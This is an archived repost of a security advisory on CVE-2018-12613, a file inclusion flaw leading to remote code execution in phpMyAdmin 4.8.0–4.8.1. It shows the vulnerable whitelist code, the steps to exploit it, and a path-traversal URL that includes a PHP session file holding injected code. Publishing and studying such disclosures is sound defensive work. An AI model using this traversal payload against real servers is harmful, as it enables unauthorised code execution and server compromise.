{"id":12725,"date":"2018-07-02T14:19:13","date_gmt":"2018-07-02T22:19:13","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/07\/02\/news-6493\/"},"modified":"2018-07-02T14:19:13","modified_gmt":"2018-07-02T22:19:13","slug":"news-6493","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2018\/07\/02\/news-6493\/","title":{"rendered":"SSD Advisory \u2013 phpMyAdmin File Inclusion and Remote Code Execution"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Ori Nimron| Date: Mon, 02 Jul 2018 12:19:53 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3700\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><br \/><script>var obj = jQuery('#a-href-3700');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities Summary<\/strong><br \/> Authenticated users can exploit a file inclusion vulnerability in phpMyAdmin which can then be combined with another vulnerability, to perform Remote Code Execution. In addition, authnticated attackers can view files and execute PHP files that located on the server by exploiting a bug in the part of the code that is responsible for redirects and loading of whitelisted pages.<\/p>\n<p><strong>Vendor Response<\/strong><br \/> The vendor, phpMyAdmin, issued a fix on the 21st of June 2018. Version 4.8.2 and newer aren&#8217;t affected.<\/p>\n<p><strong>CVE<\/strong><br \/> CVE-2018-12613<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Henry Huang, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Affected systems<\/strong><br \/> phpMyAdmin 4.8.0 and 4.8.1 (running on Linux systems)<\/p>\n<p><strong>Vulnerability Details<\/strong><br \/> The root cause of the vulnerability can be found inside <em>\/index.php<\/em> file in lines 54-63 which calls the function Core::CheckPageValidity\u00a0that is located in <em>\/libraries\/classes\/Core.php<\/em> in lines 444-476:<\/p>\n<p>Index.php:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b3aa4e01a07e693409216\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\">index.php<\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> if (! empty($_REQUEST[&#8216;target&#8217;])      &amp;&amp; is_string($_REQUEST[&#8216;target&#8217;])      &amp;&amp; ! preg_match(&#8216;\/^index\/&#8217;, $_REQUEST[&#8216;target&#8217;])      &amp;&amp; ! in_array($_REQUEST[&#8216;target&#8217;], $target_blacklist)      &amp;&amp; Core::checkPageValidity($_REQUEST[&#8216;target&#8217;])  ) {      include $_REQUEST[&#8216;target&#8217;];      exit;  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0013 seconds] -->  <\/p>\n<p>\/libraries\/classes\/Core.php:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b3aa4e01a088724157097\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> public static function checkPageValidity(&amp;$page, array $whitelist = [])  {      if (empty($whitelist)) {          $whitelist = self::$goto_whitelist;      }      if (! isset($page) || !is_string($page)) {          return false;      }        if (in_array($page, $whitelist)) {          return true;      }        $_page = mb_substr(          $page,          0,          mb_strpos($page . &#8216;?&#8217;, &#8216;?&#8217;)      );      if (in_array($_page, $whitelist)) {          return true;      }        $_page = urldecode($page);      $_page = mb_substr(          $_page,          0,          mb_strpos($_page . &#8216;?&#8217;, &#8216;?&#8217;)      );      if (in_array($_page, $whitelist)) {          return true;      }        return false;  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a088724157097-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a088724157097-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a088724157097-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a088724157097-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a088724157097-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a088724157097-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a088724157097-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a088724157097-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a088724157097-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a088724157097-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a088724157097-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a088724157097-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a088724157097-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a088724157097-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a088724157097-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a088724157097-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a088724157097-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a088724157097-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a088724157097-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a088724157097-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a088724157097-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a088724157097-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a088724157097-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a088724157097-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a088724157097-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a088724157097-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a088724157097-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a088724157097-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a088724157097-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a088724157097-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a088724157097-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a088724157097-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a088724157097-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a088724157097-34\">34<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a088724157097-1\"><span class=\"crayon-m\">public<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">static<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">checkPageValidity<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">page<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">array<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">whitelist<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a088724157097-2\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a088724157097-3\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">empty<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">whitelist<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a088724157097-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">whitelist<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">goto_whitelist<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a088724157097-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a088724157097-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">isset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">page<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">||<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-e\">is_string<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">page<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a088724157097-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">false<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a088724157097-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a088724157097-9\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a088724157097-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">in_array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">page<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">whitelist<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a088724157097-11\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a088724157097-12\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a088724157097-13\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a088724157097-14\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_page<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mb_substr<\/span><span class=\"crayon-sy\">(<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a088724157097-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">page<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a088724157097-16\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a088724157097-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">mb_strpos<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-i\">page<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;?&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;?&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a088724157097-18\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a088724157097-19\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">in_array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_page<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">whitelist<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a088724157097-20\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a088724157097-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a088724157097-22\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a088724157097-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_page<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">urldecode<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">page<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a088724157097-24\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_page<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mb_substr<\/span><span class=\"crayon-sy\">(<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a088724157097-25\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_page<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a088724157097-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a088724157097-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">mb_strpos<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-i\">_page<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;?&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;?&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a088724157097-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a088724157097-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">in_array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_page<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">whitelist<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a088724157097-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a088724157097-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a088724157097-32\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a088724157097-33\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">false<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a088724157097-34\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0029 seconds] -->  <\/p>\n<p>We can see that there is a flaw in the check that was put in to prevent a file inclusion vulnerability, which can be bypassed by referencing &#8216;db_sql.php?&#8217; in our request.<\/p>\n<p>Steps to exploit the vulnerabilities:<\/p>\n<ol>\n<li>Log in to phpMyAdmin<\/li>\n<li>Run SQL\u00a0query that contains the PHP\u00a0arbitrary code, for example: <strong>select &#8216;&lt;?php phpcredits(); ?&gt;&#8217;<\/strong><\/li>\n<li>Take the session ID (it is the value of the <i>phpMyAdmin<\/i> inside the cookie)<\/li>\n<li>Create using this information a URL similar to this:<\/li>\n<\/ol>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b3aa4e01a08b849714376\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> http:\/\/&lt;your domain or ip&gt;\/phpmyadmin\/index.php?target=db_sql.php%253f%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flib%2Fphp%2Fsessions%2Fsess_skf209lf7h9gei97puae1829t4k1td4n<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a08b849714376-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a08b849714376-1\"><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/&lt;your domain or ip&gt;\/phpmyadmin\/index.php?target=db_sql.php%253f%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flib%2Fphp%2Fsessions%2Fsess_skf209lf7h9gei97puae1829t4k1td4n<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0002 seconds] -->  <\/p>\n<p><b>Result<\/b><br \/> <a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/07\/Capture.png\" data-slb-active=\"1\" data-slb-asset=\"980963935\" data-slb-internal=\"0\" data-slb-group=\"3700\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-3701\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/07\/Capture-300x168.png\" alt=\"\" width=\"1781\" height=\"1000\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/07\/Capture-300x168.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/07\/Capture-768x431.png 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/07\/Capture-1024x575.png 1024w\" sizes=\"auto, (max-width: 